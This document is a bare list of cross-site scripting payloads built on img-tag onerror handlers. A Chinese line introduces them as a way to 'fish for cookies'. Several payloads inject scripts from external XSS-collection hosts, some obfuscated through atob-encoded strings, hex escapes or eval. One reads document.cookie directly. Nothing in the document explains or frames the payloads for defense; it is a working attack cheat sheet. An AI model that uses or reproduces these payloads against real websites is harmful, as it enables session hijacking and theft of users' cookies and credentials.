<img src='non-exist.jpg'onerror="alert('xss')">
<img src=# onerror=alert(123)>
<img src=# onerror=alert(document.cookie)>
The following use a platform to fish for cookies:
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
<img src="#">
<img src="#">
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
<img src=x width="0" height="0"></img>
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>